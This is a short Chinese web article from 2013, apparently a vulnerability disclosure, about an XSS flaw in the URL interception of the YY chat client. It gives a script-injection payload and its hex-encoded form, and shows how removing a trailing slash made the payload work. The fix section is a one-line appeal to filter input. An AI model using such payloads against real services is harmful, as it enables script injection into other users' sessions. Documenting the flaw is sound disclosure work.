• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    多玩YY URL拦截可致XSS攻击

    时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

    构造新代码
     
    </a><a><script>alert('xss')</script></a>
    然后16进制加密得到
     
    %3c/%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e
    发出去,结果行不通
     
     
     


     
    删除域名后面的/,再试试,涛涛电脑知识网,看效果吧
     
     


    %3c/%61%3e%3c%61%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c/%73%63%72%69%70%74%3e%3c/%61%3e
     


     
     
     
    修复方案:

    亲,涛涛电脑知识网,要屏蔽啊!

  • 上一篇:Discuz 某插件SQL注入漏洞及修复
  • 下一篇:蚂蜂窝存在js标签过滤不严致xss攻击
    • 相关文章
    • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1